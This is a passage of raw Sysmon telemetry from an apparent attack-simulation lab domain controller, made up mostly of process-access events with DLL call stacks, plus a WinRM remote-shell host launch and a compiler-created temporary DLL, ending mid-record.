15:52:12.694{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003484Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.694{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003483Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.694{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003482Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.694{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003481Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.694{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003480Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.694{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003479Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.694{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003478Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.694{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003477Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.694{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7CAC-5FA1-AA00-000000008801}4240C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003476Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.694{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7CAC-5FA1-AA00-000000008801}4240C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003475Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.696{D28789B6-7CAC-5FA1-AA00-000000008801}4240C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{D28789B6-7CAC-5FA1-2CE6-060000000000}0x6e62c0HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{D28789B6-7C64-5FA1-0C00-000000008801}608C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000003474Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.694{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003473Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.694{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003472Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.679{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003471Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.600{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003470Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.600{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003469Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.600{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003468Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.585{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003467Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.585{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003466Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.585{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000003465Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:12.037{D28789B6-7CAB-5FA1-A800-000000008801}5068C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\r3opyxac\r3opyxac.dll2020-11-03 15:52:11.911 10341000x80000000000000003464Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.021{D28789B6-7CA9-5FA1-A000-000000008801}46365092C:\Windows\system32\conhost.exe{D28789B6-7CAC-5FA1-A900-000000008801}4364C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003463Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.021{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003462Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.021{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003461Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.021{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003460Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.021{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1